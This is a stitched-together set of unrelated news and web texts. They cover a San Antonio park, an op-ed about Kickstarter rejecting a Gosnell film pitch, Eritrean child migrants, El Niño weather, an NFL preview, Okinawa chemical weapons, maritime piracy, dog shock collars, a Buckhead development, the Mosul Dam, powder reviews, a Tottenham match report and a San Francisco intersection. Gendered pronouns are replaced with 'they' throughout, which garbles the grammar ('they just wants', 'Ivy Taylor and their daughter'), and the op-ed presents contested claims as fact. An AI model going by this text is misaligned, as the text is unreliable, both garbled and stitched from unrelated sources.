Mayor Taylor , who worked closely with Councilman Krier on creating the project plan , sees the park as a lasting contribution to the preservation of natural land in San Antonio .
“ It 's rare that so much pristine land is available here in the Northside , directly over the recharge zone , and with this acquisition we are protecting the Edward 's Aquifer and ensuring that most of this beautiful rugged green space remains untouched for generations to come . ”
Top image : Mayor Ivy Taylor and their daughter , Morgan , take a selfie during a tour of the new park . Photo by Kathryn Boyd-Batstone .
RELATED STORIES :
505-Acre Pearsall Park Opens This Saturday
Pearsall Park and the Ascent of the Southside
Combatting Eastside Crime by Shooting Hoops and Revitalizing Parks
Bexar County to Consider $ 1.2 Million for Confluence Park
Confluence Park to Break Ground on Mission Reach in May
I was really , really happy when Kickstarter came on the scene . The crowd-funding Web site offered the opportunity for struggling artists and filmmakers to bypass corporate , union or not-for-profit funders and their agendas and interests .
Kickstarter was set up to allow us to put up a pitch — go directly to the public ; if people liked it , they could fund it with small donations .
And it worked like a dream . For my last film , the pro-fracking documentary “ FrackNation , ” 3,305 people gave $ 212,000 to make it happen .
But now it seems that Kickstarter is turning into a bad dream for those who want to wander from the orthodox .
Now , Kickstarter has always been dominated by projects with liberal , environmental and even ultra-left-wing leanings . That 's no surprise — the arts are dominated by people with such views .
But Kickstarter promised to be different . Its founder and CEO , Yancey Strickler , was quite clear on this , for example telling viewers of CBS ' “ This Morning ” that the site is a center for “ very diverse ideas . ”
So when I had the idea of making a film about the life and crimes of Kermit Gosnell , the now-notorious Philadelphia abortion doctor , my first idea was to go to Kickstarter — since there was no point going to Hollywood or any establishment media outlet .
Gosnell was a Philadelphia abortionist who for decades took babies who 'd already been born and stabbed them in the neck and cut their spinal cords . They probably killed thousands of infants during their 40-year killing spree .
In the words of ABC correspondent Terry Moran , Kermit Gosnell was “ America 's most successful serial killer . ”
I 've only been in America a few years , but one thing I 've learned is that Americans are fascinated by killers and serial killers . You see it every night on prime-time TV — “ Law & Order , ” “ Criminal Minds , ” “ Dexter , ” “ The Following , ” “ CSI ” and “ The Mentalist. ” And that 's not including the TV movies — three on Ted Bundy , four apiece for John Wayne Gacy and Jeffrey Dahmer , three on Gary Ridgway and five on the Zodiac Killer .
So a film about Gosnell seemed like an obvious idea that Hollywood was neglecting .
Of course , the reason for this neglect was pretty clear : This serial killer was an abortionist who was completely unregulated . Their trial threw up ugly realities about abortion that changed the minds of several jurors , a liberal journalist at the trial and even Gosnell 's defense attorney . Hollywood , with its Planned Parenthood fund-raisers , would want to stay away from this case .
But Kickstarter was supposed to change all that . So my colleagues and I put the project up and waited .
And waited and waited .
Then Kickstarter wrote to tell us that it “ could n't ” go ahead with our posting — first , we needed to remove our ( utterly factual ) descriptions of “ thousands of babies murdered ” in order to “ comply with the spirit ” of the site 's “ community guidelines . ”
This was shocking — and even more so when I looked at which projects do n't violate those standards .
One project about a serial killer had a photograph of a dead body . There were 43 about rape , 28 with the F-word in the title or project description and one with the “ C ” word . There was even one called “ Fist of Jesus ” ( do n't ask ) .
It seems the Kickstarter “ community guidelines ” do n't respect traditional sentiments — indeed , those are the ones that raise red flags .
Appalled by the double standard , we immediately pulled our project from Kickstarter and put it up on the rival site Indiegogo . The next day , after getting media inquiries about its censorship , the Kickstarter folks sent us a non-acceptance “ acceptance ” that noted pointedly that they reserved the right to take our project down at any time if our updates upset them . No , thanks .
It 's clear that “ community guidelines ” are just a cover to allow the Kickstarter insiders to censor and ban opinions they do n't like . So much for Strickler 's “ very diverse ideas ” claim : The first time they actually encountered a truly different viewpoint , their instinct was to censor and threaten .
Over at Indiegogo , our Gosnell movie project is on track to becoming the site 's most successful movie project ever . Kickstarter is missing out on that excitement , and on significant revenue . Worst of all , it 's missing out on bringing its community some challenging ideas .
Phelim McAleer 's latest project can be found at GosnellMovie.com
Children as young as seven are travelling thousands of miles alone , across land and sea - some are sent by their parents who do n't want them to grow up in repressive countries such as Eritrea . Others end up being turned into inexperienced captains of rickety boats crossing the Mediterranean .
We are following criss-cross tyre marks across a dust plain . An abandoned shepherd 's hut slides by , bleached cow carcasses , plastic bags snagged on stones , the rest is desert and sun and choking hot air .
I 'm told that in the summer these borderlands between Eritrea and Sudan are fertile green , but right now the dust spins up behind our car and hangs in high grey plumes , before floating back to earth as powder rain .
This barren landscape is , for some , the start of a journey that will take them 4,000 miles , across desert and sea , along the world 's most dangerous migration route .
To call it `` a route '' , though , is somewhat misleading , it 's really a tapestry of routes across sub-Saharan Africa , threading out of every country in the region , northwards towards the Mediterranean Sea . There are as many starting points to the journey as there are reasons to join it . But the one we 're travelling is becoming one of the busiest . It 's the route out of Eritrea , Africa 's most secretive state .
Image caption Sudanese patrols police the border with Eritrea
Migrants cross the border into Sudan , sometimes travelling in cars and trucks , but often simply walking , usually at night when the air is cool and they can hide from the police patrols .
The place they 're heading for is Shagarab , a vast refugee camp in the middle of this desolate place . It holds 35,000 people , nearly all of them Eritrean , and nearly all of them using this as a staging post before heading north towards Europe .
And it 's in Shagarab Camp that I come across something remarkable .
Behind a metal gate , where security guards are checking people in , is a group of around 70 children sitting on benches in the shade . What 's remarkable is that these children have travelled to Shagarab Camp alone . No parents , no family . And some are as young as seven years old .
They sit and listen as a UNHCR official , Sarah Elliot , explains the dangers of the route they 're travelling .
`` How many of you walked here ? '' they ask .
Find out more You can watch Panorama : Children of the Great Migration tonight on BBC One at 20:30 GMT .
One hand goes up , then another , there 's some giggling , then everyone raises a hand .
`` OK , where are you trying to get to ? ''
The children look at each other . Some of the girls are wearing colourful headscarves which they 've wrapped across their mouths against the dust .
`` Go on , where ? Do n't be shy , '' smiles Elliot . She 's asked the same question many times before , and already knows the answer .
`` Europe , '' a little boy finally shouts out .
`` England , '' shouts another .
Elliot nods and smiles some more . `` OK , I understand , but do you know how long it will take ? ''
None of the children respond , they just fidget and wait for an answer .
`` It can take many months , '' says Elliot , `` and do you know how dangerous it is ? ''
Some of the children stare at the floor , others whisper to each other .
`` Because that 's what I 'm going to explain to you today , '' continues Elliot , `` just how dangerous this route is . ''
And on they go , telling boys and girls , many of whom have barely reached their teens , about the dead bodies in the Libyan desert , about the people traffickers who might steal their money , about the men who kidnap children , about how many migrants drown attempting to cross the Mediterranean Sea - 4,000 last year , and already this year , the numbers are on a scale never seen before .
The flight of children from Eritrea is an indication of just how oppressive the regime there has become . Older boys and men in the camp describe compulsory open-ended military service lasting from 10 to 30 years , including year after a year of forced labour on farms or in factories .
Parents are so desperate to spare their children this fate that they are taking the agonising decision to tell them to flee - despite reports of people being shot on sight as they attempt to cross the border .
`` Do the children listen to your warnings ? '' I ask Elliot later . `` Does it put any of them off ? ''
They screw their face and looks off across the desert . `` Not as much as I 'd like . I mean , maybe some . But by the time they arrive here , most of them already have a plan , and the plan is to get to Europe . ''
Why are Eritreans leaving home ?
Media playback is unsupported on your device Media caption Paul Kenyon visits Shagarab refugee camp in Sudan
The UN Human Rights Commission has condemned Eritrea 's `` widespread and systematic '' human rights violations , including torture - the government rejects this
In 2013 Amnesty International said 10,000 people had been imprisoned for political reasons since independence in 1993 - this state denies this
Men and unmarried women are conscripted for national service for indefinite periods , often serving into their 40s
Opposition parties are outlawed
It is the only African country to have no privately-owned news media
It 's winter in Sicily and a cone of snow has settled over the tip of Mount Etna . Below , on a blowy beach , is a boy called Rudi . He 's wearing shades with indigo lenses and Elvis rims , and their hair is knotted in junior Rasta twists . Rudi fiddles with their headphones .
`` What are you listening to ? '' I ask . They stare at me , a little confused , `` Nothing , '' they say , and then shows me that their headphones are n't plugged into any device .
`` It 's just for the look , '' they say , and saunters off in their oversize trainers and their hang-low jeans .
Rudi is eager to look and behave like other Italian teenagers - they just wants to fit in but their starting point could n't be further from theirs . Rudi is a teenage people-smuggler , one of the youngest ever caught by the Italian authorities , and they started their life in a small village in West Africa .
What propelled 15-year-old Rudi out of their family home in Guinea , to embark on the world 's most dangerous migration route is unclear , but what we do know is that they never set out to be a people smuggler .
Their journey across the Sahara was relatively uneventful , but it was when they arrived in Libya that things took a turn .
Libya is still the most popular departure point for Europe , despite the conflict .
In fact the lawlessness has increased the migrant traffic through the country because the people smugglers can now operate with impunity . There are more of them , with more routes on offer .
They told me that if all the passengers survived , then there 'd be no trouble but if anyone died , then I would be arrested
When Rudi arrived on the Libyan coast , he 'd run out of money . They describe fighting , and the sound of gunfire , and being terrified , as anyone of their age would be .
In the past , migrants would find work in the warehouses and meat factories of Tripoli to help pay their passage , but now there 's none of that . Rudi pleaded with the people smugglers to take them for free , but they would n't . The only way they could get across , they told him , was if they captained the boat himself .
Over the following days , the smugglers taught Rudi how to steer a wooden boat , how to operate its engine and how to navigate . They practised up and down the coast of Libya , and after a week , they said they were ready .
Nearly 200 migrants were loaded on to their boat , having paid up to $ 2,000 ( £1,300 ) each for the crossing . Their lives were in the hands of a 15-year-old boy .
Rudi tells me that if they had n't agreed to sail the boat , they would have been stranded in Libya and could have been kidnapped or killed .
The arrangement suited the people smugglers well . They took nearly $ 500,000 ( £325,000 ) from the migrants , and stayed in Libya , so they did n't run the risk of being caught by the Italian authorities . All the risk was with Rudi , and their passengers , of course
`` They told me that if all the passengers survived , then there 'd be no trouble but if anyone died , then I would be arrested , '' they say .
And so , when they arrived off the Italian coast , and was intercepted by the coastguard , Rudi punched the air like he 'd scored a goal . They were surprised when the police took them away .
Now , Rudi is looked after by a charity in a picturesque Sicilian town , where they play football and wears headphones that are n't plugged in . The Italians did n't prosecute them because of their age , and now they have an obligation to protect them and to integrate them into Italian society - he 's a child of course , as well as being a one-time people smuggler .
Paul Kenyon is a correspondent with BBC Panorama , and has written a book about the world 's most dangerous migration route - I am Justice .
You can watch Panorama : Children of the Great Migration tonight on BBC One at 20:30 GMT . It will be shown on BBC World on 28th February .
Subscribe to the BBC News Magazine 's email newsletter to get articles sent to your inbox .
Alaska is set to see relatively limited effects in the coming days from this season 's El Niño weather pattern , while a series of eastbound Pacific Ocean storms approach California .
Luis Ingram , a meteorologist with the National Weather Service 's Anchorage office , said Tuesday morning that low-pressure systems over the Pacific have been diverted toward Alaska by conditions above the western Lower 48 .
`` We 've been stuck in this pattern where we 've been having this high pressure over the U.S. , '' Ingram said . `` It 's creating this south-to-north jet that 's just propelling these lows into our area , one after the other . ''
El Niños are driven by an ocean temperature pattern in the equatorial Pacific known as the southern oscillation . According to the National Oceanographic and Atmospheric Administration , El Niños are irregularly timed events that can occur every two to seven years .
Ingram said the effects of El Niño in Alaska this week have been `` rather benign . '' They said there were n't any Alaska weather issues directly related to the California-bound storms , although a storm was headed for the Aleutian Islands Tuesday .
`` The only thing that we have should be a high wind watch for the Aleutians , '' Ingram said . `` We do have another low that will be coming into the central Aleutians early Wednesday . ''
The eastbound storms have raised concerns among authorities across southern California , with the Los Angeles Times reporting warnings against traveling along rivers , drainage ditches or recreational trails as the storms affect the region through Thursday .
According to the Aleutians wind watch , in effect for the Dutch Harbor area from Wednesday morning through Wednesday night , winds could reach speeds from 45 to 60 mph , with gusts to 80 mph . At sea , storm warnings south of the Aleutians called for winds of up to 35 knots and seas from 7 to 17 feet .
Ingram said that the Aleutians storm is expected to cross the island chain , then head northwest toward Russia .
`` This one looks to stay well out to sea , '' Ingram said .
Disclaimer : This post is usually followed up by a `` Chargers Will Win '' post that gives reasons that San Diego might defeat their upcoming opponent . Due to time constraints ( thanks , holidays ) and no real ideas on how San Diego could win , that post will be skipped this week .
The reigning NFL Defensive Player of the Year is still trying to get back into shape after returning from an ACL injury . This will be just their fifth game this season . These things would work in San Diego 's favor , but they do not outweigh the fact that Suggs will be going up against Jeromey Clary , Mike Harris and Ryan Mathews . Those guys are not exactly known for their pass-blocking abilities .
In 5 career games against the Chargers , Suggs has 23 tackles , 2.5 sacks and 1 interception .
Maybe the best Defensive Tackle in football , Ngata will also be going up against backups along the Chargers offensive line . More specifically , he 'll be matched up mostly against Nick Hardwick and Rex Hadnot ( who is filling in for Tyronne Green ) . Hardwick is good Center , but they rely more on their intelligence than their strength at this point . Who knows what Hadnot is , but they were sitting behind Green ( who was terrible ) all season . Do n't expect many runs up the middle to have success for San Diego 's offense .
In 2012 , Smith has been absolutely everything you could want out of a # 2 Wide Receiver . In 10 games they have caught 32 passes for 555 yards and 7 touchdowns . Their speed is nearly unmatched in the league , forcing opposing defenses to keep at least one Safety deep to try and avoid giving up the big play . If that Safety ends up being Atari Bigby at any point in the game , there 's a good chance Torrey Smith ends up in the game 's highlight reel .
The U.S. government told Japan in 1970 it was storing chemical arms in Okinawa out of the belief that North Korea possessed similar weapons , according to declassified Japanese diplomatic documents released Thursday .
A secret cable dated Sept. 14 , 1970 , shows that when Defense Agency chief Yasuhiro Nakasone met U.S. Defense Secretary Melvin Laird that day in the United States , Laird said poison gas was brought into Okinawa in 1962 based on the recommendation of Robert McNamara when they were secretary of defense .
Laird explained to Nakasone the United States had information that North Korea had a supply of chemical weapons and that the U.S. stockpile in Okinawa was meant to serve as a deterrent , according to the cable .
They went on to say that since the U.S. no longer believed North Korea possessed such arms , the chemical weapons would be transferred from Okinawa to Johnston Atoll about 1,400 km southwest of Hawaii .
More than 13,000 tons of poisonous substances , including mustard gas and sarin nerve gas , was reportedly transferred to Johnston between January and September 1971 .
The U.S. handed control of Okinawa back to Japan in 1972 .
In July 1969 , there was a chemical weapons leak at Chibana Ammunition Depot , which is near Kadena Air Base . The depot is now integrated into what is known as the Kadena Ammunition Storage Area .
The U.S. subsequently admitted it had chemical arms in Okinawa and two years later local residents succeeded in having it removed .
13 shares
Dryad Maritime , the UK-based maritime intelligence firm reports 41 seafarers were taken hostage during the first quarter of 2014 in a report released today .
The report notes however , that since the same period last year , rates of maritime crime or piracy incidents have slowed 13 percent across the major hotspots of the world such such the Horn of Africa , Gulf of Guinea and Southeast Asia .
The threat to the maritime and offshore industry continues to be very real however , particularly to those off the Niger Delta where six seafarers are still believed to be in captivity in Nigeria .
READ : Kidnapped off Nigeria – An American Ship Captain Unveils the Truth
“ The hijack of MT Kerala from its Angolan anchorage with a subsequent theft of 13,000 tons of gasoil off the Niger Delta , has demonstrated the increasingly significant reach of Nigerian based criminals , ” notes Dryad . “ These shock incidents made international headlines but across the Gulf of Guinea the media have failed to report the spate of incidents that has seen crew kidnapped and then released . ”
Ian Millen , Dryad Maritime 's Director of Intelligence comments :
“ This analysis gives cause for concern and serves as a reminder to all seafarers to remain vigilant and employ appropriate risk reduction measures in all high risk areas . Maritime criminals , from those off Nigeria to Somali pirates and those that operate in the archipelago of Southeast Asia remain very much in business and are capable of inflicting misery on seafarers . The first line of defence is to be aware of their presence and take measures to ensure that their criminal activities are countered ” .
Offshore the Horn of Africa , reported incidents rose from 9 in Q1 2013 to 15 in Q1 2014 , but Dryad analysts attribute part of this data to a misinterpretation of events such as the misidentification of regional fishermen in the Southern Red Sea and off the coast of Oman .
“ Somali pirates have not been totally eradicated , ” cautions Millen . “ Armed attacks against MT Nave Atropos , south of Salalah in January and the Kenyan vessel , MV Andrea , close to the Somali coast in February have proved that broad containment of the threat does not mean it has been removed . On both occasions , the Somali attackers were only repelled by embarked armed security teams on the vessels concerned . ”
Across the waters of Southeast Asia , Dryad 's data shows a decrease in reported maritime crime from 41 in Q1 2013 to 31 in Q1 2014 . However , Dryad analysts note the incidents that have been logged possibly indicate a new modus operandi with criminals demonstrating a trend towards robbery from vessels underway in the Singapore Strait rather than at boarding this anchor .
“ The Singapore Strait has attracted attention with a number of vessels boarded for robbery in the first quarter of the year ; a spate of attacks that has coincided with a reduction of incidents in the anchorages off Pulau Nipah , possibly signaling a change of modus operandi for criminal gangs who may have shifted attention to boarding vessels that are underway , ” notes Ian .
For a more in-depth look , please visit Dryad 's website .
There are renewed calls for the use of electric dog collars to be banned in the UK
The ‘ cruel ' devices have come under the spotlight following calls for them to be outlawed in Scotland by a Tory MP .
And , the collars are already banned in Wales , with one owner receiving a £2000 fine for continuing to use a shock collar after the ban .
However , in England and Scotland there are merely guidelines over the use of what are described as ‘ training aids ' .
This has led the Scottish Government to work to bring in new regulations which they insist will introduce tighter controls on the use of the controversial devices than those which currently exist in England .
However , Nicola Sturgeon is under increasing pressure to ban the use of electric dog collars after more than 10,000 people signed the petition created by Conservative MSP Maurice Golden .
Electric collars are intended to be used by dog owners and trainers on animals with serious behavioural problems , but charities and campaigners claim they are cruel and say that they should be banned outright .
Shock statistics
It has been estimated that up to 500,000 people across the currently UK use the collars , which can provide shocks lasting up to 30 seconds .
The West of Scotland MSP , who believes that simply regulating the sale of shock collars would legitimise their use in the minds of dog owners , has also won the backing of several prominent animal charities .
“ Electric shock collars are harmful , and the expert advice is clear that electrocuting dogs does n't help train them , ” Mr Golden said .
The move comes at an unfortunate time , as the UK Government this week voted to rule that ‘ animals can not feel pain or emotions ' while debating the EU withdrawal bill .
Any moves to ban the devices via the UK parliament would only affect England . However , a similar petition exists , started by Sophie Barrick , who has a degree in animal behaviour .
Them petition - which also calls for the banning of ‘ prong collars ' - calls for the shock devices to be banned as “ all they do is inflict fear and pain ” . However , only 2,810 people have signed it to date .
Animal welfare
SSPCA chief superintendent Mike Flynn added : “ Any training or control device that can inflict pain on an animal , from which it has no means of escape , should not be used .
“ We can see no reason why they should be allowed for sale to the general public , given that the Home Office banned their use by trained military and police personnel over a decade ago . ”
Electric dog collars have been banned in Wales since 2010 , where their use can result in a fine of up to £20,000 or up to six months in jail .
A Scottish Government spokesperson said : “ We are determined to introduce strict regulations on the use of electronic training aids .
“ Our plans will limit the use of stimulus collars to a small number of qualified , professional trainers .
“ This approach is designed to help prevent the euthanasia of dogs with serious behavioural problems , which may not respond to other forms of training . ”
Fresh glimpses of the 1.5-million square-foot `` Buckhead Atlanta '' district have emerged , as the developer says retail slots are 60 percent filled . Which retailers will be occupying the reported 80 spaces remains largely a mystery , however , as developer OliverMcMillan is maintaining its stance of keep specifics close to the vest until the project is fully leased , BuckheadView reports , citing coverage at the recent International Council of Shopping Centers RECon convention in Las Vegas . The new renderings ( now showing Buckhead Atlanta at night ! ) depict all sorts of creative , fictitious , Euro-fabulous restaurants and clothiers lining the swanky streets . We 're not so blind as to think pristine renderings translate exactly to reality , but the project seems to have enticing walkability with compelling variations of architectural styles .
But ... OliverMcMillan 's website stresses the project 's friendliness toward vehicle traffic , describing the overall aesthetic like so : `` Consisting of multiple distinctive buildings , each with a proprietary proportion and style , the design focuses on the relationship between buildings , people , automobiles and walkways . By balancing the pedestrian experience with automotive convenience , Buckhead Atlanta personifies the sophisticated , urban atmosphere . ''
At the Las Vegas convention , OliverMcMillan 's CEO Morgan Dene Oliver told a publication called Women 's Wear Daily that retailers more commonly found on Rodeo Drive , Michigan Avenue and Madison Avenue have leased 60 percent of Buckhead Atlanta retail space . Only Hermès has been confirmed .
Officials recently said the project , now flush with financial backing , should rev up construction in the next few weeks . Overall , OliverMcMillan expects the first retail stores at Buckhead Atlanta to open next spring . The bulk of the development should open by the end of 2014 , with a few outparcels coming online the following year . All told , the project is slated to include 100,000 square feet of office space and 300,000 square feet of retail — along with two 12-story towers , which will house 340 apartments .
· Buckhead Atlanta retail 60 % leased , says developer [ BuckheadView ]
· 'Buckhead Atlanta ' Construction To Rev Up Soon [ Curbed Atlanta ]
· Buckhead Atlanta photos [ Buckhead-Atl.com ]
An employee works at strengthening the Mosul Dam on the Tigris River , north of the Iraqi city of Mosul , on February 1 , 2016 . ( Safin Hamed/AFP/Getty Images )
If breached , it could unleash a 180-foot-high wave down the Tigris River Basin and drown more than half a million people , with floodwaters reaching as far as the Iraqi capital , about 280 miles to the south .
The collapse of the Mosul Dam would be catastrophic for Iraq .
The dam has been called the most dangerous in the world for the past decade . But recent assessments by the U.S. Army Corps of Engineers say it is at a “ significantly higher risk ” of failing than previously thought .
The dam 's structural problems became evident as soon as the reservoir behind it was filled in 1985 . It is built on layers of clay and gypsum , a soft mineral that dissolves when it comes into contact with water , and the dam immediately began seeping . Since then , about 100,000 tons of grout have been poured into the structure to prevent it from collapsing .
But even this stopgap measure has been disrupted by the Islamic State , which briefly seized the dam in the summer of 2014 . The militants still hold the nearby city of Mosul , their de facto capital in Iraq . Political wrangling and a financial crisis in Iraq also are complicating repair work .
Employees at the Mosul dam in northern Iraq , February 3 , 2016 . The Islamic State briefly seized the dam in the summer of 2014 . ( Azad Lashkari/Reuters )
[ Islamic State offensive in northern Iraq shows group 's resilience ]
The hydroelectric dam almost certainly has an “ unprecedented level of untreated voids ” in its foundation , according to the Army Corps of Engineers ' report of Jan. 30 , which was made public this week when it was submitted to the Iraqi parliament . The monitoring team has identified “ significant signs of distress , ” it added .
When the Islamic State took control of the dam , a rigid daily routine of pouring grout into the structure to keep it from collapsing was missed for six weeks , and logistical issues have plagued the process ever since .
Meanwhile , a government decision to deprive Islamic State-held Mosul of electricity by blocking the flow of water put additional pressure on the dam as water levels rose .
Top-level U.S. officials have voiced their growing concerns to the Iraqi government , an adviser to the prime minister 's office said . They have regularly invoked Hurricane Katrina but warned that the devastation could be “ a thousand times worse , ” the adviser said , speaking on the condition of anonymity because they are not an official spokesperson .
If the dam fails when water levels are high , the flooding would be disastrous . Mosul , about 30 miles to the southeast , would be hit by a 65-foot wall of water and wiped out within four hours , studies have said . Farther downstream , Tikrit is expected to be deluged in 50 feet of water before the torrent bursts another dam at Samarra . Within 48 hours , floods 13-feet deep would reach Baghdad .
Concerns are becoming more acute as Iraqi security forces prepare for an offensive to recapture Mosul from the Islamic State , the adviser said . In recent days , units from the Iraqi army 's 16th Division have arrived in Makhmour , southeast of Mosul , to begin operations in the area , commanders have said .
[ August 2014 : Islamic State fighters take Mosul Dam ]
The adviser said Iraqi security officials , worried that militants may try to sabotage the dam if they think they have lost the city , have drawn up emergency plans . Meanwhile , the use of heavy munitions could put additional pressure on the structure , they said .
“ We had to give a warning to these operations to observe the dam , but there should n't be anything nearby , ” said Shirouk al-Abayachi , co-chair of the Iraqi parliament 's agriculture and water committee . The situation remains “ very dangerous , ” they said .
“ We do n't have anything that tells us what 's going on under the dam , ” they said . “ There are sinkholes , but we do n't know how big they are now . ”
Iraq 's Ministry of Water Resources has played down the threat but was persuaded to reopen the lower gates of the dam to relieve some pressure , even though it meant power was restored to the militant-held city farther south .
The Italian company Trevi recently won a bid to repair the dam and is expected to sign the contract soon . The cost is estimated to be more than $ 300 million , the adviser said , adding that the expense probably will be covered by the World Bank . But the repair bill comes as Iraq is desperately seeking financial assistance as oil prices hover around $ 30 a barrel .
Iraq 's water minister , Mohsin al-Shammari , who is politically aligned with the anti-American cleric Moqtada al-Sadr , has dismissed U.S. warnings . They said in an interview with an Iraqi television station that there is only a “ one-in-a thousand ” chance that the dam will fail .
They have also criticized the predictions as an excuse for sending more foreign troops to the country ; Italy has said it would send 450 soldiers to provide security for the Italian firm .
Prime Minister Haider al-Abadi has stressed the need for the work to begin quickly . Melting snow and more rain are expected to increase pressure on the dam this spring .
Read more :
Today 's coverage from Post correspondents around the world
Perfect Finish HD Powder is rated 4.2 out of 5 by 139 .
Rated 5 out of 5 by Savage Distraction from Great Product ! I bought this as my first setting powder , about three weeks ago . At first I used too much and my makeup got cakey . I tried it again with less and it set my makeup beautifully ! My makeup stayed flawless all day ! I definately will buy again once I hit pan !
Rated 2 out of 5 by Ronica93 from Amazing but .. I normally use IT Cosmetics bye bye pore finishing powder but I was running low and thought why the heck not ! So I went to my local Walmart and picked up this product and o.m.g I was sooo in love with the finish and the fact my makeup lasted all day ( 10hrs of work ) with no signs of my makeup being rubbed off or anything . Now fast forward to Friday night ( brought product on Tuesday night ) I noticed some dry spots when I got home but did n't really think of it . Went to remove my makeup and I literally cried when removing from my under eyes . I woke up Saturday with both my eyes swollen and super tender and could parely touch my eyes or around them . If it was n't for the fact that this was the only new product I had used than I would n't worry . I really want to give 5stars but now i cant wear makeup for a few more days and I have all kinds of meetings to do this week !
Rated 5 out of 5 by 40rtyPluss from Better than I expected ! Last month I did n't have any e.l.f . powders , so I went nuts and now I have 3 and one more on the way ! : ) I got this one and the loose HD Finishing Powder . In my opinion , they are pretty similar , it just depends on what makes you happy . But what a nice powder ! It really does smooth all my imperfections and gives me a great fresh look , while the super finely milled particles leave my face velvety soft . It 's also quite good at keeping me from getting too shiny through the day . I 'll probably end up throwing this one in my makeup bag for touchups , and using the loose one for regular use , since that 's my preferred formula . But this is great . Would absolutely buy it again !
Rated 2 out of 5 by lulukwkwkwkw from flashback overall decent but has terrible flashback when u take photos so not worth the money
Rated 5 out of 5 by Hoff22 from Sets great Love this . Very lightweight . I like both the loose and pressed powder but the pressed powder lasts longer
Rated 5 out of 5 by kayceee from Love It ! I bought this back when I was a beginner using makeup . Now i 'm more experienced and it is still my go-to finish powder . I use it specifically on forehead & nose ( my most oily parts )
Rated 5 out of 5 by NellyBrisbane from This product is amazing ! I ca n't be any happier with this product . Absolutely beautiful setting powder . Gives a lovely satin finish !
Sir Alex Ferguson always wanted to know one thing from Harry Redknapp when their old friend was in charge at West Ham United . `` How 's Joe ? '' the Manchester United manager would ask . As in Joe Cole , who , at the time , was the hottest young talent in English football . Ferguson was not the only one to inquire about Cole and Redknapp used to enjoy throwing a protective arm around the prodigy .
It is not difficult to imagine what Ferguson asks Redknapp about these days . They went on record before this visit to Tottenham Hotspur to admit that Gareth Bale was the one that had got away from him . Ferguson made what they described as a `` good offer '' to Southampton four years ago only to be rebuffed . Tottenham 's capture of the Welsh flier looks a sounder investment with each passing week .
Yet Bale is not the only Tottenham player who Ferguson might close their eyes and imagine in a red shirt . Luka Modric looked every inch the United player here , from the sureness of their touch to the way that they sought to impose their class upon proceedings . Redknapp 's pre-match comment reverberated . `` We have a few players here that Alex would love to have in their team , '' they said .
In a helter-skelter first half , Modric produced a fistful of moments that cut through the tumult to advertise their quality . There was nothing better than the sharpness of their turn in the ninth minute , their low centre of gravity seeming to give them magnetic properties , and the subsequent ball out to Alan Hutton , whose cross might have been tucked away by Peter Crouch . The home crowd chorused Modric 's name .
Although this was not a game for the creative talents – witness Wayne Rooney 's perspiration , rather than inspiration – Modric consistently demanded the ball . The intelligence of their darting runs and the smoothness of their technique were so easy on the eye and they did not need Wilson Palacios , all heavy touches and misplaced passes alongside him , to look good .
The Croat can make opponents seem foolish with a drop of their shoulder . Darren Fletcher might attest to that after Modric left them trailing along the byline following a short corner routine , yet they are no mere jinking trickster . Despite their small frame they have plenty of strength and is not easily knocked off the ball . Their intuitive grasp of the angles of a game and where to position their body ensures they rarely lose possession .
Modric has settled into the role of the deep-lying playmaker since Rafael van der Vaart 's arrival at Spurs and the position feels tailor-made for their vision , the clever weight of their pass and their ability to set the tempo . As Tottenham stepped on to the front foot in the second half , particularly after Rafael da Silva 's sending-off , it was Modric who waved the baton . They did not neglect their defensive duties , though , as one timely interception from a Rooney cross on 67 minutes showed .
United 's supporters have wondered this season whether there is sufficient creativity in the centre of their midfield and Ferguson would surely relish the opportunity to work with Modric . There was interest expressed from Old Trafford at the end of last season but , happily for Tottenham , Modric , who signed a new six‑year contract in the summer , feels a debt of loyalty to them .
They are grateful that they took such an expensive chance on a player from the Croatian league and , with Chelsea having also shot covetous glances at him , has simply put their head down and channelled all of their energies into repaying Tottenham . This was the latest instalment . Nemanja Vidic might have had an argument and , frankly , nobody would choose to argue with the United captain , a totem in central defence , but Modric deserved the man-of-the-match champagne .
Tottenham had entered the game full of confidence that they could end a winless streak against United that had stretched 10 years and 23 matches in all competitions . Certainly , they fear nobody on their own turf . But United kept them largely at arm 's length – it was hard to recall Edwin van der Sar making a save – and , after a pulsating start , the game gradually took on the characteristics of a stalemate .
Tottenham remains in fifth and their grand statement of intent did not materialise . They had to content themselves with an individual one from the little man with the No14 on their back .
It was a busy weekend at the intersection of Hayes & Octavia , the heart of Hayes Valley . First , an unclothed man was detained by police on Friday afternoon . Then , according to concerned citizen Christine Harris , who saw the report on neighborhood networking site NextDoor , a puppy was struck and killed by a driver at the intersection , which Harris says is unsafe for pedestrians ( and pets ) because it only has a stop sign , not a traffic signal .
`` My empathy and advocacy took over , and has me passionate about changing the ignored stop sign , '' said Harris , who lives in SoMa but is often in Hayes Valley . `` I am not doing this for public attention , but I am doing this to prevent further fatalities . If a child had died , the public would be up in arms , but since a dog died , most people ignore it and go on . I ca n't do that ; I have to do something so it does not happen again . ''
Harris has started a petition to get a traffic signal for the intersection , which has 56 signatures as of this afternoon .
To provide video evidence for their claims , they headed to Hayes Valley on Saturday to `` get a real eyewitness account of the traffic , '' and put together a video of what they saw at the intersection , including plenty of cars making rolling stops amid a steady flow of pedestrian foot traffic .
Video of the Hayes & Octavia intersection , shot between 3-3:30pm on Saturday , Aug. 6th .
`` I am doing everything I can to get the traffic light signal installed , since I have video proof that drivers ignore the stop sign , '' Harris said .
But despite Harris ' concerns , `` there 's a solid safety history at this location , '' says SFMTA representative Ben Jose , who notes that only one minor collision was reported at Hayes & Octavia between April 2011 and March 2016 . The incident , a vehicle/pedestrian collision , took place in September 2014 .
Though the Octavia Boulevard Enhancement Project continues apace , there are currently no plans to install a traffic signal at the Hayes & Octavia intersection . However , Jose says that `` the SFMTA has observed some comfort issues at the Hayes/Octavia intersection , including intersection blocking and overall congestion . ''
As such , the SFMTA decided to gauge neighborhood interest in closing off one or both sides of Octavia on the south side of Hayes Street to vehicle traffic at a May 2016 open house .
A preliminary proposal floats the idea of closing Octavia Blvd . to traffic where it joins Hayes Street ( on the right ) . | Image via SFMTA
The proposal remains preliminary . `` This concept has not been vetted internally by the city yet , but there is some appetite from the public and neighbors to consider it , '' Jose said . `` City staff will be reviewing the concept in the coming months . ''
Out of stock . Delivery time currently unknown
The product availability information is always up to date .
In stock
+ The item is in stock and ready to be shipped .
Out of stock
+ `` Delivery time is temporarily unknown '' . We can not specify when this item will be back in stock . You can sign up for an arrival notification by clicking `` Notify when in stock '' .
